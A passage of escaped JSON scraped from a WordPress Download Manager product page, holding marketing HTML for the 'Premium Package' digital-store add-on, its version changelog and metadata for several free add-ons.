class=\\\"media-body\\\">\\r\\n<h3>Product &amp; Price Variation<\\/h3>\\r\\nUnlimited Product Variations. Create single or multiple variations ( i.e. licenses types ) with increments or decrements of the base price.\\r\\n\\r\\n<\\/div>\\r\\n<\\/div>\\r\\n<\\/div>\\r\\n<div class=\\\"col-md-12\\\">\\r\\n<div class=\\\"media\\\">\\r\\n<div class=\\\"pull-left feature-icon\\\"><img src=\\\"http:\\/\\/www.wpdownloadmanager.com\\/wp-content\\/uploads\\/2011\\/11\\/simple-checkout.png\\\" alt=\\\"Simplest Checkout Option\\\" \\/><\\/div>\\r\\n<div class=\\\"media-body\\\">\\r\\n<h3>Simplest Checkout Option<\\/h3>\\r\\nPremium Package Add-on introduced simplest checkout system ever, no complex steps, both guests\' and members\' checkout just exactly in 2 clicks.\\r\\n\\r\\n<\\/div>\\r\\n<\\/div>\\r\\n<\\/div>\\r\\n<div class=\\\"col-md-12\\\">\\r\\n<div class=\\\"media\\\">\\r\\n<div class=\\\"pull-left feature-icon\\\"><img src=\\\"http:\\/\\/www.wpdownloadmanager.com\\/wp-content\\/uploads\\/2011\\/11\\/email-cart.png\\\" alt=\\\"Save &amp; Email Cart\\\" \\/><\\/div>\\r\\n<div class=\\\"media-body\\\">\\r\\n<h3>Save &amp; Email Cart<\\/h3>\\r\\nAdd items to your cart, you can save it to checkout later or email the saved cart to someone you want to pay for the items.\\r\\n\\r\\n<\\/div>\\r\\n<\\/div>\\r\\n<\\/div>\\r\\n<div class=\\\"col-md-12\\\">\\r\\n<div class=\\\"media\\\">\\r\\n<div class=\\\"pull-left feature-icon\\\"><img src=\\\"https:\\/\\/cdn0.iconfinder.com\\/data\\/icons\\/kameleon-free-pack-rounded\\/110\\/Key-64.png\\\" alt=\\\"Software Licensing\\\" \\/><\\/div>\\r\\n<div class=\\\"media-body\\\">\\r\\n<h3>Software Licensing<\\/h3>\\r\\nIntegrated Software Licensing option with this Digital Store add-on gives you a complete license key generation, key activation, and verification system.\\r\\n\\r\\n<\\/div>\\r\\n<\\/div>\\r\\n<\\/div>\\r\\n<div class=\\\"col-md-12\\\">\\r\\n<div class=\\\"media\\\">\\r\\n<div class=\\\"pull-left feature-icon\\\"><img src=\\\"https:\\/\\/cdn2.iconfinder.com\\/data\\/icons\\/dellipack\\/48\\/interact.png\\\" alt=\\\"Automatic Order Expiration\\\" \\/><\\/div>\\r\\n<div class=\\\"media-body\\\">\\r\\n<h3>Automatic Order Expiration<\\/h3>\\r\\nPremium Package Add-on has an option to setup custom update access period. Like if you provide 1-year free update of your software after someone purchases your digital item, you can set update period 365 days and after 1 year ( 365 days ) customer will not be able to access his purchase, the order status will be expired and he will have order renew option in order details page.\\r\\n\\r\\n<\\/div>\\r\\n<\\/div>\\r\\n<\\/div>\\r\\n<div class=\\\"col-md-12\\\">\\r\\n<div class=\\\"media\\\">\\r\\n<div class=\\\"pull-left feature-icon\\\"><img src=\\\"\\/\\/cdn.wpdownloadmanager.com\\/wp-content\\/uploads\\/2011\\/11\\/tax1.png\\\" alt=\\\"Easy Tax Option\\\" \\/><\\/div>\\r\\n<div class=\\\"media-body\\\">\\r\\n<h3>Easy Tax Option<\\/h3>\\r\\nWe have made the tax calculation is easier for you. From premium package settings, you can easily setup tax for different countries\\/states\\/cities just in few clicks.\\r\\n\\r\\n<\\/div>\\r\\n<\\/div>\\r\\n<\\/div>\\r\\n<div class=\\\"col-md-12 text-center\\\">\\r\\n\\r\\n<hr class=\\\"divider\\\" \\/>\\r\\n\\r\\n<h2>WordPress Digital Marketplace!<\\/h2>\\r\\nUsing Download Manager Pro &amp; Premium Package Add-on you can convert your site into a digital marketplace like themeforest or codecanyon or audioden!\\r\\n\\r\\n<hr class=\\\"divider\\\" \\/>\\r\\n\\r\\n<\\/div>\\r\\n<div class=\\\"col-md-12\\\">\\r\\n<div class=\\\"media\\\">\\r\\n<div class=\\\"pull-left feature-icon\\\"><img title=\\\"WordPress Download Manager Front-end File Manager\\\" src=\\\"http:\\/\\/cdn.wpdownloadmanager.com\\/wp-content\\/themes\\/wpdm4\\/images\\/front-end.png\\\" alt=\\\"Users will able to manage their own packages from front-end when multi-user options is enabled\\\" \\/><\\/div>\\r\\n<div class=\\\"media-body\\\">\\r\\n<h3>Front-end Store Manager<\\/h3>\\r\\nYou site members will be able to manage their products, see sales stats and earning from front-end. No need to go through WordPress admin section.\\r\\n\\r\\n<\\/div>\\r\\n<\\/div>\\r\\n<\\/div>\\r\\n<div class=\\\"col-md-12\\\">\\r\\n<div class=\\\"media\\\">\\r\\n<div class=\\\"pull-left feature-icon\\\"><img src=\\\"https:\\/\\/cdn0.iconfinder.com\\/data\\/icons\\/ie_Financial_set\\/64\\/23.png\\\" alt=\\\"Payout Options\\\" \\/><\\/div>\\r\\n<div class=\\\"media-body\\\">\\r\\n<h3>Payout Options<\\/h3>\\r\\nThe Payout feature allows you to check user earnings, pending payments, withdrawal request and send payments.\\r\\n\\r\\n<\\/div>\\r\\n<\\/div>\\r\\n<\\/div>\\r\\n<div class=\\\"col-md-12\\\">\\r\\n<div class=\\\"media\\\">\\r\\n<div class=\\\"pull-left feature-icon\\\"><img src=\\\"https:\\/\\/cdn2.iconfinder.com\\/data\\/icons\\/blue-bits-basic-and-bonus\\/48\\/031.png\\\" alt=\\\"Custom Shop Profile\\\" \\/><\\/div>\\r\\n<div class=\\\"media-body\\\">\\r\\n<h3>Custom Shop Profile<\\/h3>\\r\\nSpecial option to highlight specific shop with a dedicated shop profile page, Sellers can customize the page with their logo, shop information and products.\\r\\n\\r\\n<\\/div>\\r\\n<\\/div>\\r\\n<\\/div>\\r\\n<\\/div>\\r\\n<strong>Useful Dashboard Widgets:<\\/strong>\\r\\n\\r\\n<img class=\\\"thumbnail alignnone wp-image-57855 size-large\\\" src=\\\"https:\\/\\/www.wpdownloadmanager.com\\/wp-content\\/uploads\\/2011\\/11\\/Premium-Package-Dashboard-1024x560.png\\\" alt=\\\"Premium Package Dashboard\\\" \\/>\\r\\n\\r\\nVery detailed sales report:\\r\\n<a href=\\\"http:\\/\\/www.wpdownloadmanager.com\\/download\\/advanced-sales-report\\/\\\"><img class=\\\"thumbnail alignnone wp-image-22598 size-full\\\" src=\\\"http:\\/\\/www.wpdownloadmanager.com\\/wp-content\\/uploads\\/2014\\/11\\/wpdmpp-sales-report.png\\\" alt=\\\"WordPress Digital Store Solution Sales Report\\\" width=\\\"995\\\" height=\\\"2193\\\" \\/><\\/a>\\r\\n<div class=\\\"panel panel-default\\\">\\r\\n<div class=\\\"panel-heading\\\"><strong>Demo:<\\/strong><\\/div>\\r\\n<div class=\\\"panel-body\\\">Front-End:\\r\\n<a href=\\\"http:\\/\\/demo.wpdownloadmanager.com\\/marketplace\\/\\\">http:\\/\\/demo.wpdownloadmanager.com\\/marketplace\\/<\\/a>\\r\\nAdmin:\\r\\n<a href=\\\"http:\\/\\/demo.wpdownloadmanager.com\\/marketplace\\/wp-admin\\/\\\">http:\\/\\/demo.wpdownloadmanager.com\\/marketplace\\/wp-admin\\/<\\/a>\\r\\nLogin: demo \\/ demo<\\/div>\\r\\n<\\/div>\\r\\n<div class=\\\"alert alert-success\\\"><a href=\\\"http:\\/\\/www.wpdownloadmanager.com\\/download\\/wordpress-ecommerce-pack-digital-store-solution\\/\\\">The WordPress eCommerce Pack - Complete Digital Store Solution<\\/a> is available now! And that is all your will ever need to build your digital store or marketplace. <strong>100% satisfaction guaranteed<\\/strong>.<\\/div>\\r\\n<h3>WordPress Digital Store Solution Changelog:<\\/h3>\\r\\n[panel title=\\\"Version 3.8.5 | Released on Aug 21, 2017\\\" class=\\\"panel-default panel-logs\\\" open=\\\"1\\\"]\\r\\n<ul>\\r\\n \\t<li>[label class=\\\"success\\\" caption=\\\"New!\\\"] Added new option for cart coupon<\\/li>\\r\\n \\t<li>[label class=\\\"success\\\" caption=\\\"New!\\\"] Added full detailed coupon management page<\\/li>\\r\\n<\\/ul>\\r\\n[\\/panel][panel title=\\\"Version 3.8.4 | Released on Aug 05, 2017\\\" class=\\\"panel-default panel-logs\\\"]\\r\\n<ul>\\r\\n \\t<li>[label class=\\\"success\\\" caption=\\\"New!\\\"] Added new option for coupon code expire date<\\/li>\\r\\n \\t<li>[label class=\\\"success\\\" caption=\\\"Upgrade!\\\"] Improved free download option for premium packages<\\/li>\\r\\n<\\/ul>\\r\\n[\\/panel][panel title=\\\"Version 3.8.3 | Released on Jun 15, 2017\\\" class=\\\"panel-default panel-logs\\\"]\\r\\n<ul>\\r\\n \\t<li>[label class=\\\"danger\\\" caption=\\\"Fix!\\\"] Fixed a database table creation issue with plugin installation<\\/li>\\r\\n<\\/ul>\\r\\n[\\/panel][panel title=\\\"Version 3.8.2 | Released on Jun 13, 2017\\\" class=\\\"panel-default panel-logs\\\"]\\r\\n<ul>\\r\\n \\t<li>[label class=\\\"success\\\" caption=\\\"Upgrade!\\\"] Improved checkout process<\\/li>\\r\\n \\t<li>[label class=\\\"warning\\\" caption=\\\"Fix!\\\"] Fix issue with user signup in checkout page<\\/li>\\r\\n \\t<li>[label class=\\\"warning\\\" caption=\\\"Fix!\\\"] Fix issue with user login in checkout page<\\/li>\\r\\n<\\/ul>\\r\\n[\\/panel][panel title=\\\"Version 3.8.1 | Released on Jun 05, 2017\\\" class=\\\"panel-default panel-logs\\\"]\\r\\n<ul>\\r\\n \\t<li>[label class=\\\"warning\\\" caption=\\\"Fix!\\\"] Fix issue with role discount calculation<\\/li>\\r\\n \\t<li>[label class=\\\"warning\\\" caption=\\\"Fix!\\\"] Fix issue with individual file download in order details page<\\/li>\\r\\n<\\/ul>\\r\\n[\\/panel][panel title=\\\"Version 3.8.0 | Released on May 17, 2017\\\" class=\\\"panel-default panel-logs\\\" ]\\r\\n<ul>\\r\\n \\t<li>[label class=\\\"success\\\" caption=\\\"New!\\\"] Added 6 new dashboard widgets to review your sales<\\/li>\\r\\n \\t<li>[label class=\\\"success\\\" caption=\\\"New!\\\"] Added sales overview metabox with product edit window<\\/li>\\r\\n \\t<li>[label class=\\\"success\\\" caption=\\\"New!\\\"] Integrated email templates with wpdm pro email template editor<\\/li>\\r\\n \\t<li>[label class=\\\"warning\\\" caption=\\\"Fix!\\\"] Fixed an issue with role diiscount message<\\/li>\\r\\n<\\/ul>\\r\\n[\\/panel][panel title=\\\"Version 3.7.2 | Released on Apr 10, 2017\\\" class=\\\"panel-default panel-logs\\\" ]\\r\\n<ul>\\r\\n \\t<li>[label class=\\\"danger\\\" caption=\\\"Fix!\\\"] Fixed issue with license selection<\\/li>\\r\\n \\t<li>[label class=\\\"danger\\\" caption=\\\"Fix!\\\"] Fixed issue with single file purchase<\\/li>\\r\\n \\t<li>[label class=\\\"info\\\" caption=\\\"Upgrade!\\\"] Improved checkout process<\\/li>\\r\\n<\\/ul>\\r\\n[\\/panel][panel title=\\\"Version 3.7.1 | Released on Mar 06, 2017\\\" class=\\\"panel-default panel-logs\\\"]\\r\\n<ul>\\r\\n \\t<li>[label class=\\\"danger\\\" caption=\\\"Fix!\\\"] Fixed a compatibility issue with the wpdm pro v4.6.3<\\/li>\\r\\n<\\/ul>\\r\\n[\\/panel][panel title=\\\"Version 3.7 | Released on Feb 03, 2017\\\" class=\\\"panel-default panel-logs\\\"]\\r\\n<ul>\\r\\n \\t<li>[label class=\\\"success\\\" caption=\\\"New!\\\"] Single file pricing<\\/li>\\r\\n \\t<li>[label class=\\\"success\\\" caption=\\\"New!\\\"] Selective file purchase<\\/li>\\r\\n \\t<li>[label class=\\\"success\\\" caption=\\\"Upgrade!\\\"] Improved licensing option<\\/li>\\r\\n \\t<li>[label class=\\\"success\\\" caption=\\\"Upgrade!\\\"] License based file pricing<\\/li>\\r\\n<\\/ul>\\r\\n[\\/panel][panel title=\\\"Version 3.6.1 | Released on Dec 09, 2016\\\" class=\\\"panel-default panel-logs\\\"]\\r\\n<ul>\\r\\n \\t<li>[label class=\\\"success\\\" caption=\\\"Upgrade!\\\"] Improved invoice system<\\/li>\\r\\n \\t<li>[label class=\\\"success\\\" caption=\\\"Upgrade!\\\"] Improved payment method section<\\/li>\\r\\n \\t<li>[label class=\\\"warning\\\" caption=\\\"Fix!\\\"] Fixed issue tax calculation<\\/li>\\r\\n<\\/ul>\\r\\n[\\/panel][panel title=\\\"Version 3.6.0 | Released on Nov 20, 2016\\\" class=\\\"panel-default panel-logs\\\"]\\r\\n<ul>\\r\\n \\t<li>[label class=\\\"success\\\" caption=\\\"New!\\\"] Improved license manager<\\/li>\\r\\n \\t<li>[label class=\\\"warning\\\" caption=\\\"Fix!\\\"] Fixed translation issues<\\/li>\\r\\n \\t<li>[label class=\\\"warning\\\" caption=\\\"Fix!\\\"] Fixed issue with save cart button<\\/li>\\r\\n<\\/ul>\\r\\n[\\/panel][panel title=\\\"Version 3.5.8 | Released on Nov 14, 2016\\\" class=\\\"panel-default panel-logs\\\"]\\r\\n<ul>\\r\\n \\t<li>[label class=\\\"warning\\\" caption=\\\"Fix!\\\"] Fixed a bug that shows wrong Net Subtotal of License variation in Invoice<\\/li>\\r\\n \\t<li>[label class=\\\"warning\\\" caption=\\\"Fix!\\\"] Fixed a bug that shows wrong Customer Billing Address in Invoice<\\/li>\\r\\n \\t<li>[label class=\\\"success\\\" caption=\\\"New!\\\"] Added Premium Package template tags in Dashboard &gt;&gt; Downloads &gt;&gt; Template Editor screen<\\/li>\\r\\n \\t<li>[label class=\\\"info\\\" caption=\\\"Update!\\\"] Added missing strings to translation file<\\/li>\\r\\n<\\/ul>\\r\\n[\\/panel][panel title=\\\"Version 3.5.7 | Released on Aug 04, 2016\\\" class=\\\"panel-default panel-logs\\\"]\\r\\n<ul>\\r\\n \\t<li>[label class=\\\"warning\\\" caption=\\\"Fix!\\\"] Fixed Save Cart issue in cart page<\\/li>\\r\\n \\t<li>[label class=\\\"warning\\\" caption=\\\"Fix!\\\"] Fixed Front-end uploader metabox issue ( Not loading Premium Package Data like price, variations etc )<\\/li>\\r\\n<\\/ul>\\r\\n[\\/panel][panel title=\\\"Version 3.5.6 | Released on Jul 10, 2016\\\" class=\\\"panel-default panel-logs\\\"]\\r\\n<ul>\\r\\n \\t<li>[label class=\\\"danger\\\" caption=\\\"Fix!\\\"] Fixed issue decimal point in order total<\\/li>\\r\\n \\t<li>[label class=\\\"danger\\\" caption=\\\"Fix!\\\"] Fixed issue with country drop-down in billing address<\\/li>\\r\\n \\t<li>[label class=\\\"danger\\\" caption=\\\"Fix!\\\"] Fixed issue with default payment method integration<\\/li>\\r\\n<\\/ul>\\r\\n[\\/panel][panel title=\\\"Version 3.5.5 | Released on May 16, 2016\\\" class=\\\"panel-default panel-logs\\\"]\\r\\n<ul>\\r\\n \\t<li>[label class=\\\"danger\\\" caption=\\\"Fix!\\\"] Fixed issue tax calculation<\\/li>\\r\\n<\\/ul>\\r\\n[\\/panel][panel title=\\\"Version 3.5.3 | Released on Mar 06, 2016\\\" class=\\\"panel-default panel-logs\\\"]\\r\\n<ul>\\r\\n \\t<li>[label class=\\\"warning\\\" caption=\\\"Fix!\\\"] Fixed issue with price variation<\\/li>\\r\\n<\\/ul>\\r\\n[\\/panel][panel title=\\\"Version 3.5.2 | Released on Jan 31, 2016\\\" class=\\\"panel-default panel-logs\\\"]\\r\\n<ul>\\r\\n \\t<li>[label class=\\\"warning\\\" caption=\\\"Fix!\\\"] Fixed issue with guest order invoice<\\/li>\\r\\n \\t<li>[label class=\\\"info\\\" caption=\\\"Update!\\\"] Added guest order user info in admin orders list<\\/li>\\r\\n \\t<li>[label class=\\\"info\\\" caption=\\\"Update!\\\"] Added guest order user info in admin order details page<\\/li>\\r\\n<\\/ul>\\r\\n[\\/panel][panel title=\\\"Version 3.5.1 | Released on Jan 26, 2016\\\" class=\\\"panel-default panel-logs\\\"]\\r\\n<ul>\\r\\n \\t<li>[label class=\\\"success\\\" caption=\\\"New!\\\"] Added new option to enable\\/disable billing address in checkout page<\\/li>\\r\\n \\t<li>[label class=\\\"warning\\\" caption=\\\"Fix!\\\"] Fixed issue with admin orders list and view orders page<\\/li>\\r\\n<\\/ul>\\r\\n[\\/panel][panel title=\\\"Version 3.5.0 | Released on Jan 26, 2016\\\" class=\\\"panel-default panel-logs\\\"]\\r\\n<ul>\\r\\n \\t<li>[label class=\\\"success\\\" caption=\\\"New!\\\"] Improved checkout page<\\/li>\\r\\n \\t<li>[label class=\\\"success\\\" caption=\\\"New!\\\"] Improved guest order page<\\/li>\\r\\n \\t<li>[label class=\\\"warning\\\" caption=\\\"Fix!\\\"] Fixed issue with combined role and coupon discount calculation<\\/li>\\r\\n<\\/ul>\\r\\n[\\/panel][panel title=\\\"Version 3.4.1 | Released on Jan 20, 2016\\\" class=\\\"panel-default panel-logs\\\"]\\r\\n<ul>\\r\\n \\t<li>[label class=\\\"warning\\\" caption=\\\"Fix!\\\"] Added WPDM Core plugin requirement check to avoid activation error<\\/li>\\r\\n \\t<li>[label class=\\\"warning\\\" caption=\\\"Fix!\\\"] Fixed issue \\\"add to cart\\\" url<\\/li>\\r\\n \\t<li>[label class=\\\"success\\\" caption=\\\"New!\\\"] Added new template tag [effective_price]<\\/li>\\r\\n<\\/ul>\\r\\n[\\/panel][panel title=\\\"Version 3.4.0 | Released on Jan 18, 2016\\\" class=\\\"panel-default panel-logs\\\"]\\r\\n<ul>\\r\\n \\t<li>[label class=\\\"success\\\" caption=\\\"Upgrade!\\\"] Reorganized code base<\\/li>\\r\\n \\t<li>[label class=\\\"success\\\" caption=\\\"New!\\\"] Added offline\\/cash\\/cheque payment option<\\/li>\\r\\n \\t<li>[label class=\\\"warning\\\" caption=\\\"Fix!\\\"] Fixed issue with \\\"100%\\\" role discount<\\/li>\\r\\n \\t<li>[label class=\\\"warning\\\" caption=\\\"Fix!\\\"] Fixed issues with coupon discount<\\/li>\\r\\n<\\/ul>\\r\\n[\\/panel][panel title=\\\"Version 3.3.5 | Released on Jan 08, 2016\\\" class=\\\"panel-default panel-logs\\\"]\\r\\n<ul>\\r\\n \\t<li>[label class=\\\"info\\\" caption=\\\"Fix!\\\"] Compatibility update for WPDM Pro v4.5 and WPDM v2.8.4<\\/li>\\r\\n<\\/ul>\\r\\n[\\/panel][panel title=\\\"Version 3.3.4 | Released on Oct 05, 2015\\\" class=\\\"panel-default panel-logs\\\"]\\r\\n<ul>\\r\\n \\t<li>[label class=\\\"warning\\\" caption=\\\"Fix!\\\"] Fixed issue with payment gateway activation\\/deactivation<\\/li>\\r\\n \\t<li>[label class=\\\"warning\\\" caption=\\\"Fix!\\\"] Fixed CSS issue with payment gateway settings<\\/li>\\r\\n<\\/ul>\\r\\n[\\/panel][panel title=\\\"Version 3.3.3 | Released on Oct 02, 2015\\\" class=\\\"panel-default panel-logs\\\"]\\r\\n<ul>\\r\\n \\t<li>[label class=\\\"warning\\\" caption=\\\"Fix!\\\"] Fixed effective price issue<\\/li>\\r\\n \\t<li>[label class=\\\"warning\\\" caption=\\\"Fix!\\\"] Fixed issue with order renew<\\/li>\\r\\n \\t<li>[label class=\\\"info\\\" caption=\\\"Upgrade!\\\"] Updated license verification function<\\/li>\\r\\n \\t<li>[label class=\\\"info\\\" caption=\\\"Upgrade!\\\"] Improved invoice generation<\\/li>\\r\\n \\t<li>[label class=\\\"success\\\" caption=\\\"New!\\\"] Integrated purchased item page with user dashboard<\\/li>\\r\\n<\\/ul>\\r\\n[\\/panel][panel title=\\\"Version 3.3.2 | Released on Aug 25, 2015\\\" class=\\\"panel-default panel-logs\\\"]\\r\\n<ul>\\r\\n \\t<li>[label class=\\\"danger\\\" caption=\\\"Fix!\\\"] Fixed issue with invalid file path<\\/li>\\r\\n<\\/ul>\\r\\n[\\/panel][panel title=\\\"Version 3.3.1 | Released on Aug 18, 2015\\\" class=\\\"panel-default panel-logs\\\"]\\r\\n<ul>\\r\\n \\t<li>[label class=\\\"warning\\\" caption=\\\"Fix!\\\"] Fixed deprecated code with widget class<\\/li>\\r\\n \\t<li>[label class=\\\"warning\\\" caption=\\\"Fix!\\\"] WordPress v4.3 compatibility release<\\/li>\\r\\n<\\/ul>\\r\\n[\\/panel][panel title=\\\"Version 3.3.0 | Released on Aug 16, 2015\\\" class=\\\"panel-default panel-logs\\\"]\\r\\n<ul>\\r\\n \\t<li>[label class=\\\"success\\\" caption=\\\"New!\\\"] Option to recalculate product sales<\\/li>\\r\\n \\t<li>[label class=\\\"success\\\" caption=\\\"New!\\\"] Short-code to access guest orders<\\/li>\\r\\n \\t<li>[label class=\\\"success\\\" caption=\\\"New!\\\"] Enable\\/Disable guest downloads<\\/li>\\r\\n \\t<li>[label class=\\\"success\\\" caption=\\\"New!\\\"] Attach file with order note<\\/li>\\r\\n<\\/ul>\\r\\n[\\/panel]\",\"post_title\":\"Premium Package - WordPress Digital Store Solution\",\"post_excerpt\":\"\",\"post_status\":\"publish\",\"comment_status\":\"open\",\"ping_status\":\"closed\",\"post_password\":\"\",\"post_name\":\"premium-package-wordpress-digital-store-solution\",\"to_ping\":\"\",\"pinged\":\"\",\"post_modified\":\"2017-08-21 12:31:08\",\"post_modified_gmt\":\"2017-08-21 12:31:08\",\"post_content_filtered\":\"\",\"post_parent\":0,\"guid\":\"http:\\/\\/www.wpdownloadmanager.com\\/download\\/premium-package\\/\",\"menu_order\":0,\"post_type\":\"wpdmpro\",\"post_mime_type\":\"\",\"comment_count\":\"9\",\"filter\":\"raw\"}],\"post_extra\":{\"58950\":{\"ID\":58950,\"link\":\"https:\\/\\/www.wpdownloadmanager.com\\/download\\/wp-filebase-data-importer\\/\",\"pinfo\":{\"version\":\"1.0.0\"},\"price\":\"0.00\",\"files\":{\"1497185787522\":\"wpdm-import-filebase.zip\"},\"permalink\":\"https:\\/\\/www.wpdownloadmanager.com\\/download\\/wp-filebase-data-importer\\/\",\"currency\":\"$\",\"title\":\"WP-Filebase Data Importer\",\"thumbnail\":\"https:\\/\\/www.wpdownloadmanager.com\\/wp-content\\/plugins\\/download-manager\\/cache\\/wpdm-filebase-importer-200x200.png\",\"excerpt\":\"WP-Filebase Data Importer for WordPress Download Manager. You asked for this and...\",\"cats\":[\"add-ons\",\"free-add-ons\",\"tools\"],\"cart\":\"<a href=\'https:\\/\\/www.wpdownloadmanager.com\\/download\\/wp-filebase-data-importer\\/\' class=\'btn btn-info\' target=\'_blank\'><i class=\'icon icon-white icon-shopping-cart\'><\\/i> Buy Now<\\/a>\"},\"27148\":{\"ID\":27148,\"link\":\"https:\\/\\/www.wpdownloadmanager.com\\/download\\/box-com-explorer\\/\",\"pinfo\":{\"version\":\"1.1.0\"},\"price\":\"0.00\",\"files\":[\"wpdm-box-com.zip\"],\"permalink\":\"https:\\/\\/www.wpdownloadmanager.com\\/download\\/box-com-explorer\\/\",\"currency\":\"$\",\"title\":\"Box.com Explorer\",\"thumbnail\":\"https:\\/\\/www.wpdownloadmanager.com\\/wp-content\\/plugins\\/download-manager\\/cache\\/wpdm-box.com-explorer-200x200.png\",\"excerpt\":\"Box offers\\u00a0up to 10 GB free cloud storage and file sharing services that enable...\",\"cats\":[\"add-ons\",\"cloud-storage\",\"free-add-ons\"],\"cart\":\"<a href=\'https:\\/\\/www.wpdownloadmanager.com\\/download\\/box-com-explorer\\/\' class=\'btn btn-info\' target=\'_blank\'><i class=\'icon icon-white icon-shopping-cart\'><\\/i> Buy Now<\\/a>\"},\"26131\":{\"ID\":26131,\"link\":\"https:\\/\\/www.wpdownloadmanager.com\\/download\\/dropbox-explorer\\/\",\"pinfo\":{\"version\":\"1.2.0\"},\"price\":\"0.00\",\"files\":[\"wpdm-dropbox.zip\"],\"permalink\":\"https:\\/\\/www.wpdownloadmanager.com\\/download\\/dropbox-explorer\\/\",\"currency\":\"$\",\"title\":\"DropBox Explorer\",\"thumbnail\":\"https:\\/\\/www.wpdownloadmanager.com\\/wp-content\\/plugins\\/download-manager\\/cache\\/wpdm-dropbox-explorer-200x200.png\",\"excerpt\":\"DropBox Explorer add-on will add a new button with your Download Manager to expl...\",\"cats\":[\"add-ons\",\"cloud-storage\",\"free-add-ons\"],\"cart\":\"<a href=\'https:\\/\\/www.wpdownloadmanager.com\\/download\\/dropbox-explorer\\/\' class=\'btn btn-info\' target=\'_blank\'><i class=\'icon icon-white icon-shopping-cart\'><\\/i> Buy Now<\\/a>\"},\"25300\":{\"ID\":25300,\"link\":\"https:\\/\\/www.wpdownloadmanager.com\\/download\\/google-drive-explorer\\/\",\"pinfo\":{\"version\":\"1.3.1\"},\"price\":\"0.00\",\"files\":[\"\\/home\\/wpdownlo\\/public_html\\/wp-content\\/uploads\\/download-manager-files\\/\\/wpdm-google-drive.zip\"],\"permalink\":\"https:\\/\\/www.wpdownloadmanager.com\\/download\\/google-drive-explorer\\/\",\"currency\":\"$\",\"title\":\"Google Drive Explorer\",\"thumbnail\":\"https:\\/\\/www.wpdownloadmanager.com\\/wp-content\\/plugins\\/download-manager\\/cache\\/google-drive-200x200.png\",\"excerpt\":\"Google Drive Explorer Add-on helps you to connect with Google Drive, you can exp...\",\"cats\":[\"add-ons\",\"cloud-storage\",\"free-add-ons\"],\"cart\":\"<a href=\'https:\\/\\/www.wpdownloadmanager.com\\/download\\/google-drive-explorer\\/\' class=\'btn btn-info\' target=\'_blank\'><i class=\'icon icon-white icon-shopping-cart\'><\\/i> Buy Now<\\/a>\"},\"24090\":{\"ID\":24090,\"link\":\"https:\\/\\/www.wpdownloadmanager.com\\/download\\/wpdm-ios\\/\",\"pinfo\":{\"version\":\"3.0.0\"},\"price\":\"0.00\",\"files\":[\"https:\\/\\/itunes.apple.com\\/us\\/app\\/wp-download-manager\\/id949343686\"],\"permalink\":\"https:\\/\\/www.wpdownloadmanager.com\\/download\\/wpdm-ios\\/\",\"currency\":\"$\",\"title\":\"WPDM for iOS\",\"thumbnail\":\"https:\\/\\/www.wpdownloadmanager.com\\/wp-content\\/plugins\\/download-manager\\/cache\\/wpdm-for-ios-200x200.png\",\"excerpt\":\"Using WP Download Manager App you can check download stats, sales stats and some...\",\"cats\":[\"add-ons\",\"free-add-ons\",\"tools\"],\"cart\":\"<a href=\'https:\\/\\/www.wpdownloadmanager.com\\/download\\/wpdm-ios\\/\' class=\'btn btn-info\' target=\'_blank\'><i class=\'icon icon-white icon-shopping-cart\'><\\/i> Buy Now<\\/a>\"},\"22597\":{\"ID\":22597,\"link\":\"https:\\/\\/www.wpdownloadmanager.com\\/download\\/advanced-sales-report\\/\",\"pinfo\":{\"version\":\"1.0.0\"},\"price\":\"0.00\",\"files\":[\"wpdmpp-sales-report.zip\"],\"permalink\":\"https:\\/\\/www.wpdownloadmanager.com\\/download\\/advanced-sales-report\\/\",\"currency\":\"$\",\"title\":\"Advanced Sales Report\",\"thumbnail\":\"https:\\/\\/www.wpdownloadmanager.com\\/wp-content\\/plugins\\/download-manager\\/cache\\/wpdm-sales-report-200x200.png\",\"excerpt\":\"Advanced Sales Report helps you to keep track on sales in your digital store, yo...\",\"cats\":[\"add-ons\",\"ecommerce-add-ons\",\"free-add-ons\",\"tools\"],\"cart\":\"<a href=\'https:\\/\\/www.wpdownloadmanager.com\\/download\\/advanced-sales-report\\/\' class=\'btn btn-info\' target=\'_blank\'><i class=\'icon icon-white icon-shopping-cart\'><\\/i> Buy Now<\\/a>\"},\"21693\":{\"ID\":21693,\"link\":\"https:\\/\\/www.wpdownloadmanager.com\\/download\\/wpdm-android\\/\",\"pinfo\":{\"version\":\"3.0.0\"},\"price\":\"0.00\",\"files\":[\"https:\\/\\/play.google.com\\/store\\/apps\\/details?id=com.w3eden.wpdownloadmanager\"],\"permalink\":\"https:\\/\\/www.wpdownloadmanager.com\\/download\\/wpdm-android\\/\",\"currency\":\"$\",\"title\":\"WPDM for Android\",\"thumbnail\":\"https:\\/\\/www.wpdownloadmanager.com\\/wp-content\\/plugins\\/download-manager\\/cache\\/wpdm-android-200x200.png\",\"excerpt\":\"Using WordPress Download Manager App you can check download stats, sales stats a...\",\"cats\":[\"add-ons\",\"free-add-ons\",\"tools\"],\"cart\":\"<a href=\'https:\\/\\/www.wpdownloadmanager.com\\/download\\/wpdm-android\\/\' class=\'btn btn-info\' target=\'_blank\'><i class=\'icon icon-white icon-shopping-cart\'><\\/i> Buy Now<\\/a>\"},\"21691\":{\"ID\":21691,\"link\":\"https:\\/\\/www.wpdownloadmanager.com\\/download\\/wpdm-api\\/\",\"pinfo\":{\"version\":\"3.0.0\"},\"price\":\"0.00\",\"files\":{\"1475398329472\":\"\\/home\\/wpdownlo\\/public_html\\/wp-content\\/uploads\\/download-manager-files\\/\\/wpdm-api.zip\"},\"permalink\":\"https:\\/\\/www.wpdownloadmanager.com\\/download\\/wpdm-api\\/\",\"currency\":\"$\",\"title\":\"WPDM Api\",\"thumbnail\":\"https:\\/\\/www.wpdownloadmanager.com\\/wp-content\\/plugins\\/download-manager\\/cache\\/wpdm-api-200x200.png\",\"excerpt\":\"You can use this add-on to handle remote data access request in your Download Ma...\",\"cats\":[\"add-ons\",\"free-add-ons\",\"tools\"],\"cart\":\"<a href=\'https:\\/\\/www.wpdownloadmanager.com\\/download\\/wpdm-api\\/\' class=\'btn btn-info\' target=\'_blank\'><i class=\'icon icon-white icon-shopping-cart\'><\\/i> Buy Now<\\/a>\"},\"15749\":{\"ID\":15749,\"link\":\"https:\\/\\/www.wpdownloadmanager.com\\/download\\/wpdm-button-templates\\/\",\"pinfo\":{\"version\":\"1.2.0\"},\"price\":\"0.00\",\"files\":[\"wpdm-button-templates.zip\"],\"permalink\":\"https:\\/\\/www.wpdownloadmanager.com\\/download\\/wpdm-button-templates\\/\",\"currency\":\"$\",\"title\":\"WPDM Button 